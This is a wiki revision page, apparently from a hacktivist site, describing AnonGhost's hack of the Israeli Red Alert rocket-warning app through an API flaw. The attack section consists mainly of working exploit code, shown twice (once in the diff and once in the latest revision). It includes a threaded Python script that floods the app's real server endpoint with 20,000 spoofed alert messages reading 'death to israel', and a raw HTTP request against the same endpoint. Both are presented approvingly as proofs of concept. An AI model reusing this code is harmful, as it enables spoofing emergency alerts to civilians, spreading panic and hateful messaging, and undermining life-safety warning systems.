RedAlert: Difference between revisions
Jump to navigation
Jump to search
m (→Media Coverage) |
No edit summary |
||
| Line 1: | Line 1: | ||
Hacktivist group [https://t.me/AnonGhostOfficialTeam AnonGhost] hacked a [https://play.google.com/store/apps/details/Alerta+roja:+Israel?id=com.kobisnir.redalert Red Alert application] that Israelis use to be alerted for when Hamas performs rocket fire attacks via an [https://enlacehacktivista.org/index.php?title=Hacking_APIs API vulnerability], allowing them to send red alert messages on mass to anyone and everyone who uses the app, allowing them to say anything they like. | |||
== Explanation of the Hack == | == Explanation of the Hack == | ||
'''POC 1:''' | |||
<pre> | |||
import requests | |||
import threading | |||
import time | |||
url = "http://54.214.248.70:80/redalert/and/api/chat.php" | |||
headers = { | |||
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", | |||
"User-Agent": "Dalvik/2.1.0 (Linux; U; Android 13; M2101K7BG Build/TP1A.220624.014)", | |||
"Host": "54.214.248.70", | |||
"Connection": "Keep-Alive", | |||
"Accept-Encoding": "gzip", | |||
} | |||
data = { | |||
"msg": "death to israel", | |||
"method": "sendmsg", | |||
"time": "🇵🇸", | |||
"hash": "f1f416dd17fb4668098a8b02c845021f", | |||
"token": "fWIzje8JYuI:APA91bGbeHvcsQpsPBucVxgUZcUGIT8ZXBNCKGSNdHmxdI0BfXW-idB6qvFTLZhBBI3jmVdBawsmCSPhkeDD5g_JKz6n7Q3ohltrJOiKHOJl47Sv0417E70hbykh8lfhLvD9_GeTN9Me", | |||
"ts": "1696713616907", | |||
"username": "࿕", | |||
} | |||
num_threads = 500 | |||
num_requests = 20000 | |||
def send_request(): | |||
for _ in range(num_requests // num_threads): | |||
response = requests.post(url, headers=headers, data=data) | |||
print(response.text) | |||
threads = [] | |||
for _ in range(num_threads): | |||
thread = threading.Thread(target=send_request) | |||
threads.append(thread) | |||
thread.start() | |||
for thread in threads: | |||
thread.join() | |||
</pre> | |||
'''POC 2:''' | |||
<pre> | |||
POST /redalert/and/api/chat.php?msg=AnonGhost&method=sendmsg&time=7%3A13&hash=52bd01a926202bc0e5e7ba68270e4705&token=FUCKISRAEL&ts=1696720382270&username=AnonGhost&& HTTP/1.1 | |||
Host: 54.214.248.70 | |||
Upgrade-Insecure-Requests: 1 | |||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36 | |||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | |||
Accept-Encoding: gzip, deflate, br | |||
Accept-Language: en-US,en;q=0.9 | |||
Connection: close | |||
</pre> | |||
== Media Coverage == | == Media Coverage == | ||
# https://x.com/GroupIB_TI/status/1711234869060358562 | # https://x.com/GroupIB_TI/status/1711234869060358562 | ||
# https://thecyberexpress.com/redalert-cyberattack-anonghost-nuclear-alerts | # https://thecyberexpress.com/redalert-cyberattack-anonghost-nuclear-alerts | ||
# https://youtu.be/6zYloNKD-08?si=GIk6CqhPlN0HAotR | # https://youtu.be/6zYloNKD-08?si=GIk6CqhPlN0HAotR | ||
Latest revision as of 15:59, 12 October 2023
Hacktivist group AnonGhost hacked a Red Alert application that Israelis use to be alerted for when Hamas performs rocket fire attacks via an API vulnerability, allowing them to send red alert messages on mass to anyone and everyone who uses the app, allowing them to say anything they like.
Explanation of the Hack
POC 1:
import requests
import threading
import time
url = "http://54.214.248.70:80/redalert/and/api/chat.php"
headers = {
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"User-Agent": "Dalvik/2.1.0 (Linux; U; Android 13; M2101K7BG Build/TP1A.220624.014)",
"Host": "54.214.248.70",
"Connection": "Keep-Alive",
"Accept-Encoding": "gzip",
}
data = {
"msg": "death to israel",
"method": "sendmsg",
"time": "🇵🇸",
"hash": "f1f416dd17fb4668098a8b02c845021f",
"token": "fWIzje8JYuI:APA91bGbeHvcsQpsPBucVxgUZcUGIT8ZXBNCKGSNdHmxdI0BfXW-idB6qvFTLZhBBI3jmVdBawsmCSPhkeDD5g_JKz6n7Q3ohltrJOiKHOJl47Sv0417E70hbykh8lfhLvD9_GeTN9Me",
"ts": "1696713616907",
"username": "࿕",
}
num_threads = 500
num_requests = 20000
def send_request():
for _ in range(num_requests // num_threads):
response = requests.post(url, headers=headers, data=data)
print(response.text)
threads = []
for _ in range(num_threads):
thread = threading.Thread(target=send_request)
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
POC 2:
POST /redalert/and/api/chat.php?msg=AnonGhost&method=sendmsg&time=7%3A13&hash=52bd01a926202bc0e5e7ba68270e4705&token=FUCKISRAEL&ts=1696720382270&username=AnonGhost&& HTTP/1.1 Host: 54.214.248.70 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close